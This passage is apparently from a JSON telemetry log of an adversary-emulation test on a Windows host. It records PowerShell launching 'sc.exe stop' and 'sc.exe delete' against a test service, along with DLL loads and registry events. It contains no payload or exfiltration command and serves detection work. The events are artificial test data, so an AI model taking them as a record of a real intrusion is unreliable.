"unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "process", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "terminate", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "process", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - 
"subtype": "terminate", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 428, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570845380000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": 
"{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "command_line": "sc.exe stop AtomicTestService", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6352, - "ppid": 428, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "create", - "timestamp": 131883570845480000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}", - "unique_ppid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "sc.exe", - "image_path": "C:\\Windows\\System32\\sc.exe", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6352, - 
"process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "process", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "terminate", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "process", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe delete AtomicTestService\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7720, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - 
"subtype": "create", - "timestamp": 131883570845660000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "command_line": "sc.exe delete AtomicTestService", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": 
"C:\\Windows\\System32\\cmd.exe", - "pid": 2472, - "ppid": 7720, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "create", - "timestamp": 131883570845760000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}", - "unique_ppid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "sc.exe", - "image_path": "C:\\Windows\\System32\\sc.exe", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": 
"rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\DeleteFlag", - "registry_value": "DeleteFlag", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", - "registry_value": "Start", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_value": "AtomicTestService", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "process", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - 
"subtype": "terminate", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "process", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3136, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570845950000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - 
"image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "process", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_value": "AtomicTestService", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Type", - "registry_value": "Type", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", - "registry_value": "Start", 
- "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ErrorControl", - "registry_value": "ErrorControl", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath", - "registry_value": "ImagePath", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ObjectName", - "registry_value": "ObjectName", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570847300000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570847300000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": 
"c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": 
"registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 
131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 